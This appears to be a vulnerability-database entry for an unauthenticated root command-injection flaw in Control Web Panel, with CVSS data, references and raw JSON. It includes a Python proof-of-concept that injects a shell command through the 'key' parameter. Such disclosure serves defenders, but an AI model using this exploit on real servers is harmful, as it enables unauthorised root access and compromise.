Security Vulnerability Report
CVE-2025-67888 CVSS 7.3 HIGH

CVE-2025-67888

Published: 2026-05-08 07:16:28
Last Modified: 2026-05-08 16:02:14

Description

An issue was discovered in Control Web Panel (CWP) before 0.9.8.1209. User input passed via the "key" GET parameter to /admin/index.php (when the "api" parameter is set) is not properly sanitized before being used to execute OS commands. This can be exploited by unauthenticated attackers to inject and execute arbitrary OS commands with the privileges of root on the web server. Softaculous or SitePad must be present.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Control Web Panel (CWP) < 0.9.8.1209

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-67888 Proof of Concept
# Target: Control Web Panel (CWP) < 0.9.8.1209
# Description: Unauthenticated RCE via 'key' parameter
# Note: Requires Softaculous or SitePad to be installed

target_url = "http://target-host:2030/admin/index.php"

# The 'api' parameter must be set (value often depends on config, using generic '1' here)
# The 'key' parameter contains the injection point
# Payload: `; id` executes the 'id' command after the original command
payload = "; id"

params = {
    "api": "1",
    "key": payload
}

try:
    print("[*] Sending payload to %s" % target_url)
    response = requests.get(target_url, params=params, timeout=10)
    print("Status Code: %d" % response.status_code)
    print("Response Headers: %s" % response.headers)
    print("Response Body:\n%s" % response.text)

    # Basic check to see if command output (uid=) is in the response
    if "uid=" in response.text or "gid=" in response.text:
        print("[+] Command injection successful!")
    else:
        print("[-] Could not confirm command execution.")
except Exception as e:
    print("[-] An error occurred: %s" % str(e))

References

https://karmainsecurity.com/KIS-2025-09
https://wiki.centos-webpanel.com/cwp-security-instructions
http://seclists.org/fulldisclosure/2025/Dec/25

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67888", "sourceIdentifier": "[email protected]", "published": "2026-05-08T07:16:28.487", "lastModified": "2026-05-08T16:02:14.343", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Control Web Panel (CWP) before 0.9.8.1209. User input passed via the \"key\" GET parameter to /admin/index.php (when the \"api\" parameter is set) is not properly sanitized before being used to execute OS commands. This can be exploited by unauthenticated attackers to inject and execute arbitrary OS commands with the privileges of root on the web server. Softaculous or SitePad must be present."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://karmainsecurity.com/KIS-2025-09", "source": "[email protected]"}, {"url": "https://wiki.centos-webpanel.com/cwp-security-instructions", "source": "[email protected]"}, {"url": "http://seclists.org/fulldisclosure/2025/Dec/25", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://karmainsecurity.com/KIS-2025-09", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}